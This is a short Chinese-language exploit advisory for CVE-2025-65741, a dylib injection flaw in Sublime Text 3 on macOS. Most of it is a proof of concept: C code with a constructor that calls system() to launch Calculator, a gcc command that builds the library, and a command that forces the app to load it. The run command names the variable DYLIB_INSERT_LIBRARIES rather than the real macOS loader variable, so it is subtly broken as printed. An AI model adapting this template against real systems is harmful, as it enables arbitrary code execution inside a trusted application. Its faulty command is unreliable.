下载地址:https://www.sublimetext.com/3
CVE:CVE-2025-65741 | https://nvd.nist.gov/vuln/detail/CVE-2025-65741
作者:Vinicius Batistella
影响版本:Sublime Text 3 Build 3208 及更早版本(macOS)
Sublime Text 应用未能正确检查未签名的代码注入,攻击者可以编译一个 .dylib 库并强制该应用在应用上下文中运行它。以下示例中,Sublime Text 被强制打开了计算器二进制程序。该漏洞已在 Build 3209 及后续版本中修复。
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] Dynalic Library Injection: %s\n", argv[0]);
system("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
}
gcc -dynamiclib injection.c -arch x86_64 -o injection_x86.dylib
DYLIB_INSERT_LIBRARIES=injection_x86.dylib /Applications/Sublime\ Text.app/Contents/MacOS/Sublime\ Text